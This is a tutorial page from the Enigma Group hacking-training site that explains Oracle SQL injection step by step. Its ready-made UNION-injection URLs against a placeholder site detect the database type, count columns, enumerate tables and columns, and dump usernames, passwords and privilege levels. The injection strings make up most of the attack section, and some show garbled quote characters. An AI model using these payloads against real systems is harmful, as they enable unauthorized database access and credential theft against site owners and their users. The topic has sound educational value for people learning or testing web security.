EG Information
Training Missions
Knowledge Bank
Pimp Us Out!
Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site And Create A Link Back To Enigma Group.
|
| |
Affiliates
|
|
Enigma Group's Articles
Return to Category Selection
Oracle SQL Injection Tutorial. - Submitted By: t3hmadhatt3r 2009-05-19 21:01:34
Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB. Code: https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL%20from%20dual-- If it is a Oracle DB you should get a error like: Code: [Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result columns Now to find the amount of columns in the DB you will keep adding NULL data until you no longer receive and error. Code: https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,NULL,NULL,NULL%20from%20dual-- Now that you have the number of columns you can proceed to extract data from the DB. In this guide I will only show how to extract the account info but, other info can be extracted as well. Now we try to find which column uses "string" data type. To do this we replace the first "NULL" with 'a'. If you receive an error replace the 'a' with Null and try the next "NULL". An example of this is: Code: https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,'a','a',NULL%20from%20dual-- Once you find the columns that use string data types you can start to search for the names of the tables containing useful info. To do this we use the "user_objects" table.We also use the "object_name" and "object_type" table names to show what the names and types of tables are that are specified as user data (Credentials). A example of the following would be like so: Code: https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL, object_name,object_type,NULL%20from%20user_objects-- As you can see, we use the columns that use string data to show object_name and object_type. Tip: You can also use the all_user_objects table instead of user_objects. This will show all info seen by the user even if the user does not owned it. We should now see many different table names and types. If you don't, and you get and error, try removing NULL values and finding the columns that use string data type. In my example lets just say we found a table called USERS. We will attempt to find the names of the column inside this table by using the user_tab_columns table like so: Code: https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL, column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20% 3d%20Â’USERSÂ’-- Note: %3d is a URL encoded = and %20 is a URL encode whitespace (spacebar). Now lets say we get login, password, and priviledge columns. We can query these by using the following code: Code: https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL, login,password,priviledge%20from%20users-- You should get the login username, password, and priviledge level! Tip: If there is only one column that uses string data type then you can concatenate multiple columns like so: Code: https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL, login||Â’:Â’||password||Â’:Â’||priviledge,NULL,NULL%20from%20user_objects-- This is just like the concat command in MySQL. Tip: If you want to perfect your oracle injection knowledge I recommend getting some e-books on oracle and installing oracle on your localhost. This way you can practice on your DB. Hope you enjoyed the tutorial. Please leave feedback and suggestions of future tutorials. Thanks for reading. Return to Category Selection
If you wish to submit a comment, you must be a registered member and logged in. Login or Register.
Return to Category Selection
|
| |
|
|
Who Visited EnigmaGroup Today?
1578 Guests, 270 Users (180 Spiders)
InjectioN, Rex_Mundi, blackknight911, Klosse, Effomeidonize, trueorfalse, Distorted, JohnMalkovitzch, TheHarrisonW, strudels, Obop, hkevin, whoami, ellisp, Hessesian, Vreality2007, whisperer, advenlydent, zach, ddxc, suetekh, Vengeance987, m0rt, 2345, electro-technic, riesenjoe, Bumpadjuppy, IvanDimitriev, nmobin27, RomeoG, timetrust, 2142, 3ntr0py, BillTuer, advilapyday, lotato, lonely.connection, CloverCipher, vnd, aurena, rospark, valy1177, Blavatsky, learning, st3alth, Partisan, hackaday, K0gller, fitz, DrOptix, Jayjay, psychomarine, Vspectrum, San Marino, TinCardinal, brunoriversyhn, code-g, yshiau, Psiber_Syn, Seasharp, obencefoozy, SlayingDragons, Link-, tinuigimeni, jasonbourne, Fred, GothicLogic, somebody777, Meonkzt, CJ_Omaha, jearrorne, cls777, unsugsNashy, Balksnuntails, Sir D. Naut, batsbargy, Rik, Macabre, Nightraven, Iccyx, Repuhlsive, vipervince2002, Janomatrix, lol, veceattainc, techno, Exclaw, limited, Nikhil, evjfvir967nj, Mod777, dark_void, nermtode, Tjm, bjy1997, hecky, saraf, elprof, damoniceht, trik, jordan86, SnoopSky, dan_movie, OnetInsolefon, darkfire1515, seojlhmyrhwh, Thoplehap, MaxMeier, 1028rajeev, Abhinav2107, autotuneuser, alexelixir, Tauya, Jozinbrejl, kernel_mod, quolc, anandoump, vladavlada, Taicadine, AnnaNoult, GreenTiger, baripadatimes, Ewing, Blackbeard, thepuppeteer, BON-SELE, hak4r, Unotohumsmush, NIGHTWOLF, m4f10, avacraft, becool, thecoder, n01se, alpha1, saki, ObesseJew, ActictGlync, sajan, unicornrainbow, Domihoolbob, matt.14, max66, SnowFury, Spud101, myfabregas, Ausome1, kajman121, Frudopvia, ideveloper6, OLOLO, Bugshuppy, lamb, VagWirura, LialiTiTviors, Ordeptpen, scifics, Pozycj-Z21, Gkjt, interPuscruse, aaftab, TheCheeseDemon, blackcyxx21, jollyjimbo, N4g4c3N, rineDriekly, Rap70r, Xargos, flarornEral, ovetz13, sonu sahu, Breezy, emitleBen, Hackpad, JWTSR, nicyun, kaizo, itevainee, luke460, AverageJoe, zeratu92, litbk, Mr.Pickle, mannavard1611, LoopyLion, NexusVos, mtroscheck, burberrybagsjr, nikedunksxm, xordux, jeho, Lonewolf034, Dragonite, nhorton, Reloaded, Odile, Kaptain_k1rk, Teefelltugh, grizzly, posthuman01, jakesboy2, pwnpwnlolz, Sabo, Lakhoamnmek, Røgue, dot_Cipher, mori, snickerless1, cart1m, Xendz, KELATALFTUS, hubris, Afrika, welepocourl, carpinteyrofbt, ReottphoffBom, Reahastegah, pumashoesld, pdanielt, dmac006, DnA-Ender, Red Fox, couptupleakb, ryanjcrook, iMaxx, sh3llcod3, TimHortons, EmilaHapsaums, Feld Grau, burgeoningneophyte, Maroonhat, CookieAu, tinkansinar, Mitodina, timberlandoutletlufc, zsefvy, guccioutletox, AlexDiru, AbercrombieFitchhl, Ryuske, r0z4, slchill, kalak55, Ph4Kt480ii, beefarn, Jigoku, WrossyJes, pollolololo, ZepSung, Fragility, jell0, C9019, Othrguy, Noticon, KIKNWING, llasarus, mdubz, leah027, iellswo, MAZI_, Estilaamoli, subtentar, Trollorful, no, nas0151, Traybo, howisthechicken, thethird3y3, Somethingclever, marplusz |
| |
|
|
|
|
|